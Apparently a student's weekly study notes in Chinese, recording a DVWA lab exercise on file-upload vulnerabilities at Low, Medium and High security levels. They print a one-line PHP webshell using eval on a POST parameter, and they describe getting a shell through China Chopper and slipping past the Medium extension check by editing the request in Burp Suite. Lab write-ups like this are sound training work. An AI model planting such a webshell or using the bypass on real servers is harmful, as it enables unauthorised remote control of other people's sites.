1. 程式人生 > >第十周學習筆記

第十周學習筆記

虛擬 eve 一句話木馬 計劃 超過 getshell 打開 bubuko eval

本周學習內容:

結合DVWA學習Web應用指南

實驗內容:

進行DVWA文件上傳漏洞

實驗步驟:

Low

1.打開DVWA,進入DVWA Security模塊將 Level修改為Low,點擊Submit提交;

技術分享圖片

2.進入File Upload模塊

技術分享圖片

3.查看頁面代碼,發現服務器並沒有進行任何限制條件

技術分享圖片

4.將一句話木馬<?php@eval($_POST[‘apple‘]);?>保存為1.php

技術分享圖片

5.在DVWA上傳頁面上傳一句話木馬

技術分享圖片

6.配置中國菜刀,進行連接。右鍵添加地址,在地址欄輸入目標ip加上一句話木馬上傳的路徑,這裏使用的是本機http://localhost:8088/dvwa/hackable/uploads/1.php,密碼參數為“apple”,腳本類型默認php,編碼格式默認,點擊添加

技術分享圖片

7.選中目標右鍵,可以進行文件管理,或直接進入虛擬終端

技術分享圖片

Medium

1.打開DVWA,進入DVWA Security模塊將 Level修改為Medium,點擊Submit提交;

技術分享圖片

2.進入File Upload模塊

技術分享圖片

3.查看服務器代碼發現對上傳文件的大小進行了要求,文件類型必須是jpeg或者png,大小不能超過100000B

技術分享圖片

4.此時可以將一句話木馬的後綴名修改為1.jpg,然後利用burp suite抓包進行修改繞過校驗

技術分享圖片

5.打開burpsuite將Proxy中Option端口號修改為8082

技術分享圖片

5.打開谷歌瀏覽器,使用代理8082端口號,選中1.jpg文件點擊上傳,查看burpsuite

技術分享圖片

6.可以看到一句話木馬的後綴名為.jpg將後綴名修改為.php,點擊Forward上傳

技術分享圖片

7.一句話木馬成功繞過校驗上傳至系統

技術分享圖片

8.使用菜刀進行連接,可以獲得GetShell權限

技術分享圖片

High

1.打開DVWA,進入DVWA Security模塊將 Level修改為High,點擊Submit提交;

技術分享圖片

2.點擊進入File Upload頁面,查看服務器代碼。服務器的限制規則是.後面必須為”*.jpg”、”*.jpeg” 、”*.png類型文件,文件大小小於10000b,同時,getimagesize函數更是限制了上傳文件的文件頭必須為圖像類型。

技術分享圖片

3.使用教程上面的步驟可以查文件但是並不能上傳,或者下載文件。我搜可以一下其他方法,並下載了一個16進制編輯器,將一計劃木馬添加至圖片16進制代碼的最後上傳至系統,使用菜刀連接發現也是無法獲得最高權限。

技術分享圖片

技術分享圖片

*使用16進制編輯器會讓電腦莫名重啟,建議還是別用了,剛剛寫到結尾重啟了,從新寫一遍

第十周學習筆記